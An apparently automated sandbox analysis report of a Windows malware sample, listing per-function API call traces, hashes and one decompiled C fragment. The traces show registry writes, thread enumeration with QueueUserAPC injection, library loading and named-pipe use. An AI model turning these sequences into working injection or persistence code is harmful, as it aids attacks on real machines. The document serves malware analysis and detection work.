RegCloseKey.ADVAPI32(00B56102,?,00B56102,00000000,?,?,?,00B56102), ref: 00B757C1

Part of subcall function 00B5D44C: lstrlenW.KERNEL32(00000000,?,00000000,00000000,?,?,00B5DB20,00000000,00000000,00B62461,00000000,00000000,7764DBB0,00000020,00000000), ref: 00B5D458
Part of subcall function 00B5D44C: memcpy.NTDLL(00000000,00000000,00000000,00000106,?,?,00B5DB20,00000000,00000000,00B62461,00000000,00000000,7764DBB0,00000020,00000000), ref: 00B5D480
Part of subcall function 00B5D44C: memset.NTDLL ref: 00B5D492

CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000,00000000,?,00000000,?,?,?,00B56102), ref: 00B757F6
GetLastError.KERNEL32(?,?,00B56102), ref: 00B75801
HeapFree.KERNEL32(00000000,00000000,?,?,00B56102), ref: 00B75817
RegCloseKey.ADVAPI32(?,00000000,?,00000000,?,?,?,00B56102), ref: 00B75829

Memory Dump Source

Source File: 00000000.00000002.820887308.0000000000B50000.00000040.00020000.sdmp, Offset: 00B50000, based on PE: false

Similarity

API ID: Closelstrlen$HeapOpenlstrcatlstrcpy$AllocateCreateErrorFileFreeLastmemcpymemset
String ID:
API String ID: 1430934453-0
Opcode ID: 3f05c0ac9d92c574d5c325c0c3eaf632a123673d016cd5348defb2443ff06f09
Instruction ID: 3cacf1f4e1fed347b539297e9b89e4dcf1bae8bf4396246559ab3c99c717f0a5
Opcode Fuzzy Hash: 3f05c0ac9d92c574d5c325c0c3eaf632a123673d016cd5348defb2443ff06f09
Instruction Fuzzy Hash: 5D518D71501609EFDB21EBA4DC84EAA77FDEF04344B1485A5F918E3221DB70AE46DB50

Uniqueness

Uniqueness Score: -1.00%

Function 00B6598F, Relevance: 16.6, APIs: 11, Instructions: 144memoryregistryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,00000104,00000000), ref: 00B659C5
RtlAllocateHeap.NTDLL(00000000,00000104), ref: 00B659DA
RegCreateKeyA.ADVAPI32(80000001,?), ref: 00B65A02
HeapFree.KERNEL32(00000000,?), ref: 00B65A43
HeapFree.KERNEL32(00000000,?), ref: 00B65A53
RtlAllocateHeap.NTDLL(00000000,00000000), ref: 00B65A66
RtlAllocateHeap.NTDLL(00000000,00000000), ref: 00B65A75
HeapFree.KERNEL32(00000000,?,00B6C581,00000000,?,?,?,?), ref: 00B65ABF
RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00B6C581,00000000,?,?,?,?), ref: 00B65AE3
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00B6C581,00000000,?,?,?,?), ref: 00B65B08
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00B6C581,00000000,?,?,?,?), ref: 00B65B1D

Memory Dump Source

Source File: 00000000.00000002.820887308.0000000000B50000.00000040.00020000.sdmp, Offset: 00B50000, based on PE: false

Similarity

API ID: Heap$Free$Allocate$CloseCreate
String ID:
API String ID: 4126010716-0
Opcode ID: 06b4cac409383b297c9af718ce1d5e96824d06c0ccc0c7519a703398e2d7bb22
Instruction ID: 974223e4236f0af154d7c1dec0fabc920e8ed4a1f2a46a0163d45bb3c3320526
Opcode Fuzzy Hash: 06b4cac409383b297c9af718ce1d5e96824d06c0ccc0c7519a703398e2d7bb22
Instruction Fuzzy Hash: A051B075C00219EFDF119FD4DD848EEBBBAFB08344F1085AAE515A2220D7355EA5EF60

Uniqueness

Uniqueness Score: -1.00%

Function 00B05F64, Relevance: 16.6, APIs: 11, Instructions: 112
stringCOMMON

Download Yara Rule

C-Code - Quality: 43%

			E00B05F64(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, WCHAR** _a16, WCHAR** _a20) {
				intOrPtr _v8;
				intOrPtr _v12;
				long _v16;
				WCHAR* _v20;
				signed int _v24;
				void* __esi;
				long _t43;
				intOrPtr _t44;
				intOrPtr _t46;
				void* _t48;
				void* _t49;
				void* _t50;
				WCHAR* _t54;
				intOrPtr _t57;
				void* _t58;
				void* _t59;
				void* _t60;
				intOrPtr _t66;
				void* _t71;
				void* _t74;
				intOrPtr _t75;
				void* _t77;
				intOrPtr _t79;
				intOrPtr* _t80;
				WCHAR* _t91;

				_t79 =  *0xb0d37c; // 0x18d9818
				_v24 = 8;
				_t43 = GetTickCount();
				_push(5);
				_t74 = 0xa;
				_v16 = _t43;
				_t44 = E00B03A69(_t74,  &_v16);
				_v8 = _t44;
				if(_t44 == 0) {
					_v8 = 0xb0c1ac;
				}
				_t46 = E00B051DA(_t79);
				_v12 = _t46;
				if(_t46 != 0) {
					_t80 = __imp__;
					_t48 =  *_t80(_v8, _t71);
					_t49 =  *_t80(_v12);
					_t50 =  *_t80(_a4);
					_t54 = E00B075F6(lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + 0x102);
					_v20 = _t54;
					if(_t54 != 0) {
						_t75 =  *0xb0d2e0; // 0xdca5a8
						_t16 = _t75 + 0xb0eb10; // 0x530025
						wsprintfW(_t54, _t16, _v8, _v8, _a4, _v12, _a8);
						_push(4);
						_t77 = 5;
						_t57 = E00B03A69(_t77,  &_v16);
						_v8 = _t57;
						if(_t57 == 0) {
							_v8 = 0xb0c1b0;
						}
						_t58 =  *_t80(_v8);
						_t59 =  *_t80(_v12);
						_t60 =  *_t80(_a4);
						_t91 = E00B075F6(lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + 0x13a);
						if(_t91 == 0) {
							E00B04AAB(_v20);
						} else {
							_t66 =  *0xb0d2e0; // 0xdca5a8
							_t31 = _t66 + 0xb0ec30; // 0x73006d
							wsprintfW(_t91, _t31, _v8, _v8, _a4, _v12, _a12);
							 *_a16 = _v20;
							_v24 = _v24 & 0x00000000;
							 *_a20 = _t91;
						}
					}
					E00B04AAB(_v12);
				}
				return _v24;
			}

0x00b05f6c
0x00b05f72
0x00b05f79
0x00b05f7f
0x00b05f83
0x00b05f87
0x00b05f8a
0x00b05f8f
0x00b05f94
0x00b05f96
0x00b05f96
0x00b05f9f
0x00b05fa4
0x00b05fa9
0x00b05faf
0x00b05fb9
0x00b05fc2
0x00b05fc9
0x00b05fe2
0x00b05fe7
0x00b05fec
0x00b05ff5
0x00b05ffe
0x00b0600f
0x00b06018
0x00b0601c
0x00b06020
0x00b06025
0x00b0602a
0x00b0602c
0x00b0602c
0x00b06036
0x00b0603f
0x00b06046
0x00b0605e
0x00b06062
0x00b0609f
0x00b06064
0x00b06067
0x00b0606f
0x00b06080
0x00b0608c
0x00b06094
0x00b06098
0x00b06098
0x00b06062
0x00b060a7
0x00b060ac
0x00b060b3

APIs

GetTickCount.KERNEL32 ref: 00B05F79
lstrlen.KERNEL32(?,80000002,00000005), ref: 00B05FB9
lstrlen.KERNEL32(00000000), ref: 00B05FC2
lstrlen.KERNEL32(00000000), ref: 00B05FC9
lstrlenW.KERNEL32(80000002), ref: 00B05FD6
wsprintfW.USER32 ref: 00B0600F
lstrlen.KERNEL32(?,00000004), ref: 00B06036
lstrlen.KERNEL32(?), ref: 00B0603F
lstrlen.KERNEL32(?), ref: 00B06046
lstrlenW.KERNEL32(?), ref: 00B0604D
wsprintfW.USER32 ref: 00B06080

Part of subcall function 00B04AAB: RtlFreeHeap.NTDLL(00000000,00000000,00B05012,00000000,?,?,00000000), ref: 00B04AB7

Memory Dump Source

Source File: 00000000.00000002.820669375.0000000000B01000.00000020.00020000.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000000.00000002.820637084.0000000000B00000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.820763060.0000000000B0C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.820819562.0000000000B0D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.820852488.0000000000B0F000.00000002.00020000.sdmp Download File

Similarity

API ID: lstrlen$wsprintf$CountFreeHeapTick
String ID:
API String ID: 822878831-0
Opcode ID: b3f3152524fd5677390023b1c63661641adb46f9f23c03de72100482a86dcb65
Instruction ID: 61158131e8886b0cbea240f3aec39521da95576ebfe2bd77dd79d4b17421aafd
Opcode Fuzzy Hash: b3f3152524fd5677390023b1c63661641adb46f9f23c03de72100482a86dcb65
Instruction Fuzzy Hash: 6A416A76900219EFCF11AFA4CC4999EBFB5FF44344F054095ED04A72A1EB35DA21DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00B5E04D, Relevance: 16.6, APIs: 11, Instructions: 102registrymemorystringCOMMON

Download Yara Rule

APIs

RegOpenKeyA.ADVAPI32(80000001,?,00000001), ref: 00B5E071

Part of subcall function 00B7622F: RegCloseKey.ADVAPI32(?,00B56102), ref: 00B762B6

lstrcmpiW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,00B56102), ref: 00B5E0A0
lstrlenW.KERNEL32(00000000,00000000,00000000,00000000,?,?,00B56102), ref: 00B5E0B1
RegCreateKeyA.ADVAPI32(80000001,?,?), ref: 00B5E0EB
RegSetValueExA.ADVAPI32(00000004,?,00000000,00000004,?,00000004,?,?,00B56102), ref: 00B5E10D
RegCloseKey.ADVAPI32(?,?,?,00B56102), ref: 00B5E116
RtlEnterCriticalSection.NTDLL(00000000), ref: 00B5E12C
HeapFree.KERNEL32(00000000,?,?,?,00B56102), ref: 00B5E141
RtlLeaveCriticalSection.NTDLL(00000000), ref: 00B5E155
HeapFree.KERNEL32(00000000,?,?,?,00B56102), ref: 00B5E16A
RegCloseKey.ADVAPI32(?,?,?,00B56102), ref: 00B5E173

Memory Dump Source

Source File: 00000000.00000002.820887308.0000000000B50000.00000040.00020000.sdmp, Offset: 00B50000, based on PE: false

Similarity

API ID: Close$CriticalFreeHeapSection$CreateEnterLeaveOpenValuelstrcmpilstrlen
String ID:
API String ID: 534682438-0
Opcode ID: 05d1656e277f1c83e63f757e342beae93c2e6cee3d71ffc949e29bd000661070
Instruction ID: 8475777f9b0d96284ebb9fc7f10c48eafe1ef98b31f6bbce3659915c5015c5b2
Opcode Fuzzy Hash: 05d1656e277f1c83e63f757e342beae93c2e6cee3d71ffc949e29bd000661070
Instruction Fuzzy Hash: 25314735500108FFCB11AFA8DC48EAE7BBEEB49301B148595FA15E3130DB719A89DF50

Uniqueness

Uniqueness Score: -1.00%

Function 00B5F84F, Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 125memorystringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?,00000000,00000000,?,?,?,?,74E05520,00000000), ref: 00B5F866
lstrlen.KERNEL32(?,?,?,?,?,74E05520,00000000), ref: 00B5F876
RtlAllocateHeap.NTDLL(00000000,00000001), ref: 00B5F8AA
RtlReAllocateHeap.NTDLL(00000000,00000000,?,?), ref: 00B5F8D5
memcpy.NTDLL(00000000,?,?,?,?,?,?,?,?,?,74E05520,00000000), ref: 00B5F8F4
HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,74E05520,00000000), ref: 00B5F955
memcpy.NTDLL(?,00000000, Ut,00000000,?,?,?,?,?,?,?,?,?,?,?,74E05520), ref: 00B5F977

Strings

W, xrefs: 00B5F9A3
Ut, xrefs: 00B5F868, 00B5F964, 00B5F92F, 00B5F884, 00B5F96F

Memory Dump Source

Source File: 00000000.00000002.820887308.0000000000B50000.00000040.00020000.sdmp, Offset: 00B50000, based on PE: false

Similarity

API ID: Heap$Allocatelstrlenmemcpy$Free
String ID: Ut$W
API String ID: 3204852930-540753543
Opcode ID: ef458db46a89c745cf21c2c2ca59f8a65a733ec95a41bcbeb8e98abb19fccf59
Instruction ID: 897ba7157e01eac6866e3e2683d779142b7c47755dcd263c34e5a50bca1bc64f
Opcode Fuzzy Hash: ef458db46a89c745cf21c2c2ca59f8a65a733ec95a41bcbeb8e98abb19fccf59
Instruction Fuzzy Hash: 784128B190020AEBCF119F94CC84BAEBBF9EF04345F1484A5ED58A7211E731DA589BA1

Uniqueness

Uniqueness Score: -1.00%

Function 00B5FC07, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 112memorystringCOMMON

Download Yara Rule

APIs

StrChrA.SHLWAPI(?,0000002C,7673D3B0,00000000,74E05520), ref: 00B5FC38
StrChrA.SHLWAPI(00000001,0000002C), ref: 00B5FC4B
StrTrimA.SHLWAPI(?,?), ref: 00B5FC6E
StrTrimA.SHLWAPI(00000001,?), ref: 00B5FC7D
lstrlen.KERNEL32(?), ref: 00B5FCB2
RtlAllocateHeap.NTDLL(00000000,-00000005), ref: 00B5FCC5
lstrcpy.KERNEL32(00000004,?), ref: 00B5FCE3
HeapFree.KERNEL32(00000000,00000000,?,00000000,-00000005,00000001), ref: 00B5FD07

Strings

W, xrefs: 00B5FC1D

Memory Dump Source

Source File: 00000000.00000002.820887308.0000000000B50000.00000040.00020000.sdmp, Offset: 00B50000, based on PE: false

Similarity

API ID: HeapTrim$AllocateFreelstrcpylstrlen
String ID: W
API String ID: 1974185407-655174618
Opcode ID: 1d653d958d77ae8a9c3de27518d169210da277b212ff9069904395b7df1aedf9
Instruction ID: ed3dba24c43ae9a41d1ca3bd8519c07e6c3ae6cf39e6e6392aa3eca8555346aa
Opcode Fuzzy Hash: 1d653d958d77ae8a9c3de27518d169210da277b212ff9069904395b7df1aedf9
Instruction Fuzzy Hash: 42318035901206EFCB11AFA8CC88FAEBBF9EF05741F1444A6F9059B260DB749945DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00B54776, Relevance: 15.2, APIs: 10, Instructions: 186stringmemoryCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(0434BFB8,00000000,00000000,00000000,00000000,00000000,00000000,?,0000000D,00000000,?,?,?,?,?,00000000), ref: 00B54799
lstrlen.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,0000000D,00000000,?,?,?,?,?,00000000), ref: 00B547A8
lstrlen.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,?,0000000D,00000000,?,?,?,?,?,00000000), ref: 00B547B5
lstrlen.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00B547CD
lstrlen.KERNEL32(0000000D,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00B547D9
RtlAllocateHeap.NTDLL(00000000,?), ref: 00B547F5
wsprintfA.USER32 ref: 00B548D7
memcpy.NTDLL(00000000,?,?), ref: 00B54924
InterlockedExchange.KERNEL32(00B81188,00000000), ref: 00B54942
HeapFree.KERNEL32(00000000,00000000), ref: 00B54983

Part of subcall function 00B6B1DC: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 00B6B205
Part of subcall function 00B6B1DC: memcpy.NTDLL(00000000,?,?), ref: 00B6B218
Part of subcall function 00B6B1DC: RtlEnterCriticalSection.NTDLL(00B81488), ref: 00B6B229
Part of subcall function 00B6B1DC: RtlLeaveCriticalSection.NTDLL(00B81488), ref: 00B6B23E
Part of subcall function 00B6B1DC: HeapFree.KERNEL32(00000000,00000000,?,00000000), ref: 00B6B276

Memory Dump Source

Source File: 00000000.00000002.820887308.0000000000B50000.00000040.00020000.sdmp, Offset: 00B50000, based on PE: false

Similarity

API ID: lstrlen$Heap$AllocateCriticalFreeSectionmemcpy$EnterExchangeInterlockedLeavewsprintf
String ID:
API String ID: 4198405257-0
Opcode ID: 9fc6728c5f4377ffad7c307110518f605eb5400b72b9033d0dbd45ab9fc2d5e1
Instruction ID: 92e7727fb5a17eb73011378442e72db554221b059ae25a7fb9a253769c7f2e6b
Opcode Fuzzy Hash: 9fc6728c5f4377ffad7c307110518f605eb5400b72b9033d0dbd45ab9fc2d5e1
Instruction Fuzzy Hash: 23618D71901249EFCB10DFA8CC84FAA3BF9FB08305F0444A9F905A7260DB74AA99CF50

Uniqueness

Uniqueness Score: -1.00%

Function 00B6A458, Relevance: 15.1, APIs: 10, Instructions: 110librarymemoryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,?,00000000,00000000,74E5F5B0,00B6683A,?,?,?,?,?,?,?,00B577C7,?), ref: 00B6A478
TlsAlloc.KERNEL32(?,?,?,?,?,?,?,00B577C7,?,?,?,?,?), ref: 00B6A482
LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,00B577C7,?,?,?,?,?), ref: 00B6A4AB
LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,00B577C7,?,?,?,?,?), ref: 00B6A4B9
LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,00B577C7,?,?,?,?,?), ref: 00B6A4C7
LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,00B577C7,?,?,?,?,?), ref: 00B6A4D5
LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,00B577C7,?,?,?,?,?), ref: 00B6A4E3
LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,00B577C7,?,?,?,?,?), ref: 00B6A4F1
___HrLoadAllImportsForDll@4.DELAYIMP ref: 00B6A51B
HeapFree.KERNEL32(00000000,00000000,00000000,?,0000000C,00000000,?,?,?,?,?,?,?,?,00B577C7,?), ref: 00B6A59C

Memory Dump Source

Source File: 00000000.00000002.820887308.0000000000B50000.00000040.00020000.sdmp, Offset: 00B50000, based on PE: false

Similarity

API ID: Load$Library$AllocDll@4FreeHeapImports
String ID:
API String ID: 1792504554-0
Opcode ID: a335f4881e8b8d1b13c377184d821b081d3763ea554c2ec869557cd45d37dd9f
Instruction ID: 0ac58f82487adcb0750fefffb99f0cd6430278bee6be651334d273e3234d57ba
Opcode Fuzzy Hash: a335f4881e8b8d1b13c377184d821b081d3763ea554c2ec869557cd45d37dd9f
Instruction Fuzzy Hash: 00415D76901219AFCF10EFE8DC88E5977ECEB08304B1548A6E606E7271DB34AA46CF51

Uniqueness

Uniqueness Score: -1.00%

Function 00B616D2, Relevance: 15.1, APIs: 10, Instructions: 68threadprocesslibraryCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(00B6683A,?,00000000,00000000,00B5B0B2,00000000,00000000,00000000,00000000,74E5F5B0,00B6683A), ref: 00B616F8
CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 00B61704
GetModuleHandleA.KERNEL32(?,0434978E,?,00000000,00000000), ref: 00B61724
GetProcAddress.KERNEL32(00000000), ref: 00B6172B
Thread32First.KERNEL32(00B6683A,0000001C), ref: 00B6173B
OpenThread.KERNEL32(001F03FF,00000000,00000000), ref: 00B61756
QueueUserAPC.KERNEL32(?,00000000,00000000), ref: 00B61767
CloseHandle.KERNEL32(00000000), ref: 00B6176E
Thread32Next.KERNEL32(00B6683A,0000001C), ref: 00B61777
CloseHandle.KERNEL32(00B6683A), ref: 00B61783

Memory Dump Source

Source File: 00000000.00000002.820887308.0000000000B50000.00000040.00020000.sdmp, Offset: 00B50000, based on PE: false

Similarity

API ID: Handle$Close$Thread32$AddressCreateFirstModuleNextOpenProcQueueSnapshotThreadToolhelp32User
String ID:
API String ID: 2341152533-0
Opcode ID: b0b22635e27d798c20befe89eefaaad07cd3d31acdd79263721fc1959374894b
Instruction ID: 62d792671945eefd697579802c53f56d273c7a2a7325d2d9468f5a2123135c57
Opcode Fuzzy Hash: b0b22635e27d798c20befe89eefaaad07cd3d31acdd79263721fc1959374894b
Instruction Fuzzy Hash: 7E215E72500108AFDF01AFA4DC88EAE7BB9EB08345B044565FA15E7160DB359D45CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00B77C17, Relevance: 15.1, APIs: 10, Instructions: 59sleepsynchronizationCOMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(?,?,00B5F0A9), ref: 00B77C2C

Part of subcall function 00B6D0D5: InterlockedExchange.KERNEL32(00B6367F,000000FF), ref: 00B6D0DC

WaitForSingleObject.KERNEL32(?,000000FF,?,?,00B5F0A9), ref: 00B77C4C
CloseHandle.KERNEL32(00000000,?,00B5F0A9), ref: 00B77C55
CloseHandle.KERNEL32(?,?,?,00B5F0A9), ref: 00B77C5F
RtlEnterCriticalSection.NTDLL(?), ref: 00B77C67
RtlLeaveCriticalSection.NTDLL(?), ref: 00B77C7F
Sleep.KERNEL32(000001F4), ref: 00B77C8E
CloseHandle.KERNEL32(?), ref: 00B77C9B
LocalFree.KERNEL32(?), ref: 00B77CA6
RtlDeleteCriticalSection.NTDLL(?), ref: 00B77CB0

Memory Dump Source

Source File: 00000000.00000002.820887308.0000000000B50000.00000040.00020000.sdmp, Offset: 00B50000, based on PE: false

Similarity

API ID: CloseCriticalHandleSection$DeleteEnterEventExchangeFreeInterlockedLeaveLocalObjectSingleSleepWait
String ID:
API String ID: 1408595562-0
Opcode ID: 77d34fa368fab4fa59cdda05a986e869123da70dcab3270dfd19c9976504fdb4
Instruction ID: bc080912a12ee56d2bca18f5a70645da283a9ba6100d01b6f1c29a1007b3cb1c
Opcode Fuzzy Hash: 77d34fa368fab4fa59cdda05a986e869123da70dcab3270dfd19c9976504fdb4
Instruction Fuzzy Hash: 02112831144716DFCA326B76DC88E5BB7F8EB083517108858F5AA93560DF35E8808F60

Uniqueness

Uniqueness Score: -1.00%

Function 00B7715A, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 89memorystringpipeCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(00B594DB,00000000,?,?,?,?,00B594DB,00000035,00000000,?,00000000), ref: 00B7718A
RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 00B771A0
memcpy.NTDLL(00000010,00B594DB,00000000,?,?,00B594DB,00000035,00000000), ref: 00B771D6
memcpy.NTDLL(00000010,00000000,00000035,?,?,00B594DB,00000035), ref: 00B771F1
CallNamedPipeA.KERNEL32(00000000,00000000,?,00000010,00000028,00000001), ref: 00B7720F
GetLastError.KERNEL32(?,?,00B594DB,00000035), ref: 00B77219
HeapFree.KERNEL32(00000000,00000000,?,?,00B594DB,00000035), ref: 00B7723C

Strings

(, xrefs: 00B77223

Memory Dump Source

Source File: 00000000.00000002.820887308.0000000000B50000.00000040.00020000.sdmp, Offset: 00B50000, based on PE: false

Similarity

API ID: Heapmemcpy$AllocateCallErrorFreeLastNamedPipelstrlen
String ID: (
API String ID: 2237239663-3887548279
Opcode ID: 3bfc500fb4b6c8c91b5434cb192d93eaf267e6a04590555642de5b1299ce38c8
Instruction ID: 73ef20f0bc6599df6132b68acb578ce6c018e3e8f3e3ba85e69855a29dd1bed6
Opcode Fuzzy Hash: 3bfc500fb4b6c8c91b5434cb192d93eaf267e6a04590555642de5b1299ce38c8
Instruction Fuzzy Hash: 7E319F36901209EBCB219F94DC44EAB7BF9EB04710F108469FE69A3221DB309E55DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00B62790, Relevance: 13.6, APIs: 9, Instructions: 110stringmemoryCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?,00000000,00000000,?,?,?), ref: 00B627A7
lstrlen.KERNEL32(?), ref: 00B627AF
lstrlen.KERNEL32(?), ref: 00B6281A
RtlAllocateHeap.NTDLL(00000000,?), ref: 00B62845
memcpy.NTDLL(00000000,00000002,?), ref: 00B62856
memcpy.NTDLL(00000000,?,?), ref: 00B6286C
memcpy.NTDLL(00000000,?,?,00000000,?,?), ref: 00B6287E
memcpy.NTDLL(00000000,00B7B3F8,00000002,00000000,?,?,00000000,?,?), ref: 00B62891
memcpy.NTDLL(00000000,?,00000002), ref: 00B628A6

Memory Dump Source

Source File: 00000000.00000002.820887308.0000000000B50000.00000040.00020000.sdmp, Offset: 00B50000, based on PE: false

Similarity

API ID: memcpy$lstrlen$AllocateHeap
String ID:
API String ID: 3386453358-0
Opcode ID: d92fcbe4cb2da9da25650fbc761afb66c18541d2717b214262431676ddf79547
Instruction ID: cdb99a0823a9bd2e464ba7bf249bcf5867bb489b697f70573a304dd001193317
Opcode Fuzzy Hash: d92fcbe4cb2da9da25650fbc761afb66c18541d2717b214262431676ddf79547
Instruction Fuzzy Hash: 87414972D0020AEBDF01CFA8CC85AAEBBF8EF58314F144496ED15A3211E735EA54DB90

Uniqueness

Uniqueness Score: -1.00%

Function 00B52C02, Relevance: 13.6, APIs: 9, Instructions: 105memorystringCOMMON

Download Yara Rule

APIs

Part of subcall function 00B5257D: RtlAllocateHeap.NTDLL(00000000,?), ref: 00B525AF
Part of subcall function 00B5257D: HeapFree.KERNEL32(00000000,00000000), ref: 00B525D4

Part of subcall function 00B6A5E4: HeapFree.KERNEL32(00000000,00000000,?,?,?,00000000,?,00B52C3F,?,?,?), ref: 00B6A620
Part of subcall function 00B6A5E4: HeapFree.KERNEL32(00000000,?,?,00000001,?,?,00000000,?,00B52C3F,?,?,?), ref: 00B6A673

lstrlen.KERNEL32(00000000,?,?,?), ref: 00B52C74
lstrlen.KERNEL32(?,?,?,?), ref: 00B52C7C
lstrlen.KERNEL32(?), ref: 00B52C86
RtlAllocateHeap.NTDLL(00000000,?), ref: 00B52C9B
wsprintfA.USER32 ref: 00B52CD7
HeapFree.KERNEL32(00000000,00000000,0000002D,00000000,00000000,00000000), ref: 00B52CF6
HeapFree.KERNEL32(00000000,?), ref: 00B52D0B
HeapFree.KERNEL32(00000000,?), ref: 00B52D18
HeapFree.KERNEL32(00000000,?,?,?,?), ref: 00B52D26

Memory Dump Source

Source File: 00000000.00000002.820887308.0000000000B50000.00000040.00020000.sdmp, Offset: 00B50000, based on PE: false

Similarity

API ID: Heap$Free$lstrlen$Allocate$wsprintf
String ID:
API String ID: 168057987-0
Opcode ID: 4d61a0d5bc685c6dad12f464aeb7a4a1d1fdffe2474d651457e3bb2512e9b2eb
Instruction ID: a6384ac7e1cda96ab190c76a5903d1df007b6e1097615f32a40077d2c91d9ad3
Opcode Fuzzy Hash: 4d61a0d5bc685c6dad12f464aeb7a4a1d1fdffe2474d651457e3bb2512e9b2eb
Instruction Fuzzy Hash: A831DE31A02315BFCB11AF64DC44F5BBBE9EF49751F0049AAFA54A3171DB708848DBA2

Uniqueness

Uniqueness Score: -1.00%

Function 00B6AA30, Relevance: 13.6, APIs: 9, Instructions: 89filesynchronizationCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,C0000000,0000FDE9,00000000,00000001,00000080,00000000,00000008,00000000,0000FDE9,?), ref: 00B6AA70
GetLastError.KERNEL32 ref: 00B6AA7A
WaitForSingleObject.KERNEL32(000000C8), ref: 00B6AA9F
CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,00000001,00000080,00000000), ref: 00B6AAC2
SetFilePointer.KERNEL32(00000001,00000000,00000000,00000002), ref: 00B6AAEA
WriteFile.KERNEL32(00000001,00001388,?,?,00000000), ref: 00B6AAFF
SetEndOfFile.KERNEL32(00000001), ref: 00B6AB0C
GetLastError.KERNEL32 ref: 00B6AB18
CloseHandle.KERNEL32(00000001), ref: 00B6AB24

Memory Dump Source

Source File: 00000000.00000002.820887308.0000000000B50000.00000040.00020000.sdmp, Offset: 00B50000, based on PE: false

Similarity

API ID: File$CreateErrorLast$CloseHandleObjectPointerSingleWaitWrite
String ID:
API String ID: 2864405449-0
Opcode ID: 8543317605956c3c45fd3d6e5cb052400e7a6cd11d4fe698125a75cfa78ea78e
Instruction ID: 4d901d7e7d0e560ba250fed7765aabde987bd25837a262c8c3abfaa15b6907ec
Opcode Fuzzy Hash: 8543317605956c3c45fd3d6e5cb052400e7a6cd11d4fe698125a75cfa78ea78e
Instruction Fuzzy Hash: DB316B31901208BEEF209FA4DD49FAE7BB8EB04325F204195F965A20A0DB748E84DF51

Uniqueness

Uniqueness Score: -1.00%

Function 00B5B790, Relevance: 13.6, APIs: 9, Instructions: 82fileCOMMON

Download Yara Rule

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000001,00000000,00B5C269,00000008,?,00000010,00000001,00000000,0000003A,?,?), ref: 00B5B7AF
WriteFile.KERNEL32(00000001,00000001,?,?,?), ref: 00B5B7E3
ReadFile.KERNEL32(00000001,00000001,?,?,?), ref: 00B5B7EB
GetLastError.KERNEL32 ref: 00B5B7F5
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,00002710), ref: 00B5B811
GetOverlappedResult.KERNEL32(?,?,?,00000000), ref: 00B5B82A
CancelIo.KERNEL32(?), ref: 00B5B83F
CloseHandle.KERNEL32(?), ref: 00B5B84F
GetLastError.KERNEL32 ref: 00B5B857

Memory Dump Source

Source File: 00000000.00000002.820887308.0000000000B50000.00000040.00020000.sdmp, Offset: 00B50000, based on PE: false

Similarity

API ID: ErrorFileLast$CancelCloseCreateEventHandleMultipleObjectsOverlappedReadResultWaitWrite
String ID:
API String ID: 4263211335-0
Opcode ID: 2771ff53a9b09ae0bc197242afad781987f668c0ef7492501710e5bf181b9372
Instruction ID: 4032b6ea2f960907aa492800702322e82f52768d7c0ea9a9207a35ea85f7edde
Opcode Fuzzy Hash: 2771ff53a9b09ae0bc197242afad781987f668c0ef7492501710e5bf181b9372
Instruction Fuzzy Hash: 3B21FC36900218ABCB119F65DC88EEE7BBDEF48711F1044A5F91AD7151DB708A98CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00B6D448, Relevance: 13.6, APIs: 9, Instructions: 72filetimeCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(00B6683A,?,00000000,00B6683A,?,?,00000000,00000000,54C7FCBB,54C7FCBB,00000000,00B5B059,00000000,74E5F5B0,00B6683A), ref: 00B6D454
_aulldiv.NTDLL(00000192,?,54D38000,00000192), ref: 00B6D46A
_snwprintf.NTDLL ref: 00B6D48F
CreateFileMappingW.KERNEL32(000000FF,00B81248,00000004,00000000,00001000,?), ref: 00B6D4AB
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000192,?,54D38000), ref: 00B6D4BD
